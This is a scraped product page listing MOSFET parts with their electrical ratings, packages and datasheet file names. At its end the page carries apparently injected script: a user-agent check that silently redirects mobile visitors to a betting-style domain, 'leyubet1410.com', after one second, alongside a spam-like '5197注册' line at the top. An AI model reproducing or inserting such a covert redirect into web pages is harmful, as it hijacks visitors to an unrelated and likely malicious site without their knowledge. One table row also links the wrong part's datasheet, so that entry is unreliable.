5197注册

  • EN

MOSFET

Part Number Configuration Type ESD Drain-Source Voltage(V) Gate-Source Voltage(V) Gate-Threshold Voltage, VGS(th)(V) Continuous Drain Current, ID(A) Static Drain-Source On-Resistance RDS(ON) (mΩ) Max. at VGS= Power Dissipation Package download
VDS VGS Min. Max. TA=25℃ TA=70℃ Tc=25℃ Tc=100℃ 10V 4.5V 2.5V 1.8V 1.5V PD(W)
YSE2210VBB Dual N+N Yes 20 ±10 0.3 1 - - 30 19 - 12 14.5 20 - 26 PPAK3X3 YSE2210VBB_REV.02_20200522.pdf
YSE2219YVB Dual P+P Yes -20 ±8 0.3 1 - - -0.4 -0.25 - 600 850 1200 - 0.312 SOT-563 YSE2219YVB_REV.02_20200522.pdf
YSE2219ZDW Dual P+P Yes -20 ±8 -0.3 -1 -0.54 -0.43 - - - 600 850 1200 - 0.278 SOT-363 YSE2219ZDW_REV.02_20200522.pdf
YSE2220ZDW Dual N+N Yes 20 ±8 0.3 1 - - 0.8 0.51 - 300 400 550 - 0.275 SOT-363 YSE2220ZDW_REV.02_20200522.pdf
YSE2310ZBB Single N Yes 20 ±10 0.3 1 - - 30 19 - 10 12 17 - 26 PPAK3X3 YSE2310ZBB_REV.02_20200522.pdf
YSE2319WKL Single P Yes -20 ±8 -0.3 -1 - - -0.25 -0.16 - 650 900 1400 - 0.155 SOT-883 YSE2319WKL_REV.02_20200522.pdf
YSE2319XUC Single P Yes -20 ±8 -0.3 -1 - - -0.4 -0.25 - 650 900 1400 - 0.45 SOT-723 YSE2319XUC_REV.02_20200522.pdf
YSE2319YUB Single P Yes -20 ±8 -0.3 -1 - - -0.4 -0.25 - 600 850 1200 - 0.312 SOT-523 YSE2319YUB_REV.02_20200522.pdf
YSE2319ZW Single P Yes -20 ±8 -0.3 -1 - - -0.4 -0.25 - 600 850 1200 - 0.275 SOT-323 YSE2219ZDW_REV.02_20200522.pdf
YSE2320WKL Single N Yes 20 ±8 0.3 1 - - 0.8 0.51 - 350 450 600 - 0.155 SOT-883 YSE2320WKL_REV.02_20200522.pdf
YSE2320XUC Single N Yes 20 ±8 0.3 0.85 - - 0.8 0.51 - 300 450 700 - 0.45 SOT-723 YSE2320XUC_REV.02_20200522.pdf
YSE2320YUB Single N Yes 20 ±8 0.3 1 - - 0.8 0.51 - 300 400 550 - 0.312 SOT-523 YSE2320YUB_REV.02_20200522.pdf
YSE2320ZW Single N Yes 20 ±8 0.3 1 - - 0.8 0.51 - 300 400 550 800 0.275 SOT-323 YSE2320ZW_REV.01 20210426.pdf
YSE2516QCE Dual N+N Yes 20 ±12 0.5 1.5 - 8.8 11 - - 8.2 11 - - 1.56 DFN2X3-6 YSE2516QCE_REV.02_20200522.pdf
YSE2P7002S Single P Yes -60 ±20 -1 -2 -0.3 0.24 - - 4000 5000 - - - 1 SOT-23 YSE2P7002S_REV.02_20200522.pdf
YSE3134KDW Dual N+N Yes 20 ±12 0.35 1.1 0.75 - - - - 380 450 800 - 0.15 SOT-363 YSE3134KDW_REV.02_20200522.pdf
YSE3520ZDW Dual N+N Yes 30 ±12 0.5 1.2 0.8 0.64 - - - 450 650 - - 0.275 SOT-363 YSE3520ZDW_REV.01 20210708.pdf
YSE3907WBC Single P Yes -30 ±20 -1.2 -2.5 - - -8.5 -5.3 23 34 - - - 3 PPAK2X3 YSE3907WBC_REV.02_20200522.pdf
YSE3907ZBB Single P Yes -30 ±20 -1.2 -2.5 - - -30 -19 20 35 - - - 27 PPAK3X3 YSE3907ZBB_REV.02_20200522.pdf
YSE3908ZBB Single N Yes 30 ±20 1.2 2.5 - - 48 30 8.5 13 - - - 35 PPAK3X3 YSE3908ZBB_REV.02_20200522.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();